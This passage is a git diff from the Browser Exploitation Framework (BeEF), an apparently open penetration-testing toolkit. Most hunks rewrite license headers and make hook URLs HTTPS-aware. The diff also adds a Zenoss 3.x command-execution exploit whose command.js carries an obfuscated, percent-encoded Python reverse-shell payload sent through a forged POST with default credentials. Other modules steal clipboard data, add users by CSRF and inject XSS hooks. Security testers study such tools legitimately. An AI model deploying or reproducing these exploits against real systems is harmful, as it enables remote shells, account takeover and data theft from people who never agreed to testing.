+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Cisco_collaboration_server_5_xss < BeEF::Core::Command
 
 	def self.options
 
 		configuration = BeEF::Core::Configuration.instance
-		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
 
 		return [
 			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest=">'}
diff --git a/modules/exploits/xss/serendipity_1.6_xss/command.js b/modules/exploits/xss/serendipity_1.6_xss/command.js
index a20ff5bbb..c919b9bb6 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/command.js
+++ b/modules/exploits/xss/serendipity_1.6_xss/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
diff --git a/modules/exploits/xss/serendipity_1.6_xss/config.yaml b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
index 96d9e9bb2..c386055cc 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/config.yaml
+++ b/modules/exploits/xss/serendipity_1.6_xss/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
@@ -22,4 +12,4 @@ beef:
             description: "Attempts to hook Serendipity <= 1.6 using XSS.
For more information see: http://www.exploit-db.com/exploits/18884/"
             authors: ["bcoles", "Stefan Schurtz"]
             target:
-                working: ["ALL"]
+                unknown: ["ALL"]
diff --git a/modules/exploits/xss/serendipity_1.6_xss/module.rb b/modules/exploits/xss/serendipity_1.6_xss/module.rb
index cf46a83d1..68356a916 100644
--- a/modules/exploits/xss/serendipity_1.6_xss/module.rb
+++ b/modules/exploits/xss/serendipity_1.6_xss/module.rb
@@ -1,24 +1,15 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Serendipity_1_6_xss < BeEF::Core::Command
 
 	def self.options
 
 		configuration = BeEF::Core::Configuration.instance
-		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
 
 		return [
 			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=\'"'}
diff --git a/modules/exploits/zenoss_3x_command_execution/command.js b/modules/exploits/zenoss_3x_command_execution/command.js
new file mode 100644
index 000000000..608c4e23e
--- /dev/null
+++ b/modules/exploits/zenoss_3x_command_execution/command.js
@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+  var user  = '<%= @user  %>';
+  var pass  = '<%= @pass  %>';
+  var target  = 'http://'+rhost+':'+rport+'/zport/About/showDaemonXMLConfig'
+
+  // reverse python payload
+  var payload = unescape('%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22')
+
+  // send request
+  var zenoss_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", [
+    {'type':'hidden', 'name':'__ac_name',     'value':user},
+    {'type':'hidden', 'name':'__ac_password', 'value':pass},
+    {'type':'hidden', 'name':'daemon',        'value':payload}
+  ]);
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  // clean up
+  cleanup = function() {
+    document.body.removeChild(zenoss_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/zenoss_3x_command_execution/config.yaml b/modules/exploits/zenoss_3x_command_execution/config.yaml
new file mode 100644
index 000000000..d58269969
--- /dev/null
+++ b/modules/exploits/zenoss_3x_command_execution/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/
+################################################################################
+beef:
+    module:
+        zenoss_command_execution:
+            enable: true
+            category: "Exploits"
+            name: "Zenoss 3.x Command Execution"
+            description: "Attempts to get a reverse shell on a Zenoss 3.x server. Valid credentials are required."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/zenoss_3x_command_execution/module.rb b/modules/exploits/zenoss_3x_command_execution/module.rb
new file mode 100644
index 000000000..5511d5b43
--- /dev/null
+++ b/modules/exploits/zenoss_3x_command_execution/module.rb
@@ -0,0 +1,29 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/
+################################################################################
+class Zenoss_command_execution < BeEF::Core::Command
+
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '8080' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'},
+			{ 'name' => 'user',  'ui_label' => 'Username',    'value' => 'admin'},
+			{ 'name' => 'pass',  'ui_label' => 'Password',    'value' => 'zenoss'},
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end
diff --git a/modules/exploits/zenoss_add_user_csrf/command.js b/modules/exploits/zenoss_add_user_csrf/command.js
index 9650a2684..474557d8d 100644
--- a/modules/exploits/zenoss_add_user_csrf/command.js
+++ b/modules/exploits/zenoss_add_user_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
   var base = '<%= @base %>'; 
   var user_level = '<%= @user_level %>';
diff --git a/modules/exploits/zenoss_add_user_csrf/config.yaml b/modules/exploits/zenoss_add_user_csrf/config.yaml
index eaf9a25f5..bcb3ea9aa 100644
--- a/modules/exploits/zenoss_add_user_csrf/config.yaml
+++ b/modules/exploits/zenoss_add_user_csrf/config.yaml
@@ -1,25 +1,15 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
         zenoss_add_user_csrf:
             enable: true
             category: "Exploits"
-            name: "Zenoss <= 3.2.1 Add User CSRF"
-            description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server."
+            name: "Zenoss 3.x Add User CSRF"
+            description: "Attempts to add a user to a Zenoss Core 3.x server."
             authors: ["bcoles"]
             target:
                 working: ["ALL"]
diff --git a/modules/exploits/zenoss_add_user_csrf/module.rb b/modules/exploits/zenoss_add_user_csrf/module.rb
index 28fac6d60..717d0cdd8 100644
--- a/modules/exploits/zenoss_add_user_csrf/module.rb
+++ b/modules/exploits/zenoss_add_user_csrf/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Zenoss_add_user_csrf < BeEF::Core::Command
   
diff --git a/modules/exploits/zenoss_daemon_csrf/module.rb b/modules/exploits/zenoss_daemon_csrf/module.rb
deleted file mode 100644
index 148f0c6bf..000000000
--- a/modules/exploits/zenoss_daemon_csrf/module.rb
+++ /dev/null
@@ -1,70 +0,0 @@
-#
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
-#
-class Zenoss_daemon_csrf < BeEF::Core::Command
-  
-	def self.options
-		return [
-			{ 'name' => 'base', 'ui_label' => 'Zenoss web root', 'value' => 'http://192.168.1.1:8080/'}, 
-			{ 'name' => 'service',
-				'type' => 'combobox',
-				'ui_label' => 'Daemon',
-				'store_type' => 'arraystore',
-				'store_fields' => ['service', 'description'],
-				'store_data' => [
-					['zeoctl', 'zeoctl (Zope Enterprise Objects server - shares database between Zope instances)'],
-					['zopectl', 'zopectl (The Zope open source web application server)'],
-					['zenhub', 'zenhub (Broker between the data layer and the collection daemons)'],
-					['zenjobs', 'zenjobs (Zenjobs)'],
-					['zenping', 'zenping (ICMP ping status monitoring)'],
-					['zensyslog', 'zensyslog (Collection of and classification of syslog events)'],
-					['zenstatus', 'zenstatus (Active TCP connection testing of remote daemons)'],
-					['zenactions', 'zenactions (Alerts - SMTP, SNPP and Maintenance Windows)'],
-					['zentrap', 'zentrap (Receives SNMP traps and turns them into events)'],
-					['zenmodeler', 'zenmodeler (Configuration collection and configuration)'],
-					['zenperfsnmp', 'zenperfsnmp (High performance asynchronous SNMP performance collection)'],
-					['zencommand', 'zencommand (Runs plug-ins on the local box or on remote boxes through SSH)'],
-					['zenprocess', 'zenprocess (Process monitoring using SNMP host resources MIB)'],
-					['zenwin', 'zenwin (Windows Service Monitoring (WMI))'],
-					['zeneventlog', 'zeneventlog (Collect (WMI) event log events (aka NT Eventlog))'],
-					['zenjmx', 'zenjmx (ZenJMX)']
-				],
-				'emptyText' => 'Select a daemon',
-				'valueField' => 'service',
-				'displayField' => 'service', #'description',
-				'mode' => 'local',
-				'autoWidth' => true
-			},
-			{ 'name' => 'action',
-				'type' => 'combobox',
-				'ui_label' => 'Action',
-				'store_type' => 'arraystore',
-				'store_fields' => ['action'],
-				'store_data' => [
-					['Start'],['Stop'],['Restart']
-				],
-				'valueField' => 'action',
-				'displayField' => 'action',
-				'mode' => 'local',
-				'autoWidth' => true
-			}
-		]
-	end
-
-	def post_execute
-		save({'result' => @datastore['result']})
-	end
-
-end
diff --git a/modules/host/clipboard_theft/command.js b/modules/host/clipboard_theft/command.js
index 1c717da87..aab376979 100644
--- a/modules/host/clipboard_theft/command.js
+++ b/modules/host/clipboard_theft/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 		if (clipboardData.getData("Text") !== null) {
 			beef.net.send("<%= @command_url %>", <%= @command_id %>, "clipboard="+clipboardData.getData("Text"));
diff --git a/modules/host/clipboard_theft/config.yaml b/modules/host/clipboard_theft/config.yaml
index ec30fcb28..00808de40 100644
--- a/modules/host/clipboard_theft/config.yaml
+++ b/modules/host/clipboard_theft/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/clipboard_theft/module.rb b/modules/host/clipboard_theft/module.rb
index 75274ab32..1fb46fe28 100644
--- a/modules/host/clipboard_theft/module.rb
+++ b/modules/host/clipboard_theft/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Clipboard_theft < BeEF::Core::Command
   
diff --git a/modules/host/detect_bitdefender2012/command.js b/modules/host/detect_bitdefender2012/command.js
new file mode 100644
index 000000000..c276a3098
--- /dev/null
+++ b/modules/host/detect_bitdefender2012/command.js
@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+    var temp=document.body.innerHTML;
+    var key="netdefender/hui/ndhui.js";
+    if(temp.indexOf(key)>0) {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Installed');
+    } else {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>,'bitdefender=Not Installed');
+    };
+
+});
+
diff --git a/modules/host/detect_bitdefender2012/config.yaml b/modules/host/detect_bitdefender2012/config.yaml
new file mode 100644
index 000000000..e2f4e621b
--- /dev/null
+++ b/modules/host/detect_bitdefender2012/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        detect_bitdefender2012:
+            enable: true
+            category: "Host"
+            name: "Detect Bit Defender 2012"
+            description: "This module detect the javascript code automatically included by Bitdefender 2012"
+            authors: ["nbblrr"]
+            target:
+                working: ["ALL"]
diff --git a/modules/host/detect_bitdefender2012/module.rb b/modules/host/detect_bitdefender2012/module.rb
new file mode 100644
index 000000000..421265c09
--- /dev/null
+++ b/modules/host/detect_bitdefender2012/module.rb
@@ -0,0 +1,13 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Detect_bitdefender2012 < BeEF::Core::Command
+
+  def post_execute
+    save({'BitDefender' => @datastore['bitdefender']})
+  end
+
+end
diff --git a/modules/host/detect_cups/command.js b/modules/host/detect_cups/command.js
index e05d44658..ce2c440cb 100644
--- a/modules/host/detect_cups/command.js
+++ b/modules/host/detect_cups/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var result = "Not Installed";
diff --git a/modules/host/detect_cups/config.yaml b/modules/host/detect_cups/config.yaml
index 9b14c62f1..a50398823 100644
--- a/modules/host/detect_cups/config.yaml
+++ b/modules/host/detect_cups/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/detect_cups/module.rb b/modules/host/detect_cups/module.rb
index a2cef67a4..2e3a87769 100644
--- a/modules/host/detect_cups/module.rb
+++ b/modules/host/detect_cups/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 class Detect_cups < BeEF::Core::Command
diff --git a/modules/host/detect_google_desktop/command.js b/modules/host/detect_google_desktop/command.js
index 428db53e0..2a22e8f3b 100644
--- a/modules/host/detect_google_desktop/command.js
+++ b/modules/host/detect_google_desktop/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var dom = document.createElement('b');
diff --git a/modules/host/detect_google_desktop/config.yaml b/modules/host/detect_google_desktop/config.yaml
index ba611bf45..5f4a721e9 100644
--- a/modules/host/detect_google_desktop/config.yaml
+++ b/modules/host/detect_google_desktop/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/detect_google_desktop/module.rb b/modules/host/detect_google_desktop/module.rb
index cadf07b80..178784cb2 100644
--- a/modules/host/detect_google_desktop/module.rb
+++ b/modules/host/detect_google_desktop/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 class Detect_google_desktop < BeEF::Core::Command
diff --git a/modules/host/detect_protocol_handlers/command.js b/modules/host/detect_protocol_handlers/command.js
index 90246fba2..e1a52f4a4 100644
--- a/modules/host/detect_protocol_handlers/command.js
+++ b/modules/host/detect_protocol_handlers/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	// Initialize
diff --git a/modules/host/detect_protocol_handlers/config.yaml b/modules/host/detect_protocol_handlers/config.yaml
index a3de123a2..221723dd7 100644
--- a/modules/host/detect_protocol_handlers/config.yaml
+++ b/modules/host/detect_protocol_handlers/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/detect_protocol_handlers/module.rb b/modules/host/detect_protocol_handlers/module.rb
index 13a295ac1..a9041d1d0 100644
--- a/modules/host/detect_protocol_handlers/module.rb
+++ b/modules/host/detect_protocol_handlers/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # Some additional protocol handlers #
 # ChromeHTML, code, Explorer.AssocProtocol.search-ms, FirefoxURL, gopher, icy, ie.http, ie.https, ie.ftp, iehistory, ierss, irc, itms, magnet, mapi, mms, mmst, mmsu, msbd, msdigitallocker, nntp, opera.protocol, outlook, pcast, rlogin, sc, search, search-ms, shout, skype, snews, steam, stssync, teamspeak, tel, telnet, tn3270, ts3file, ts3server, unsv, uvox, ventrilo, winamp, WindowsCalendar.UrlWebcal.1, WindowsMail.Url.Mailto, WindowsMail.Url.news, WindowsMail.Url.nntp, WindowsMail.Url.snews, WMP11.AssocProtocol.MMS, wpc
diff --git a/modules/host/detect_software/command.js b/modules/host/detect_software/command.js
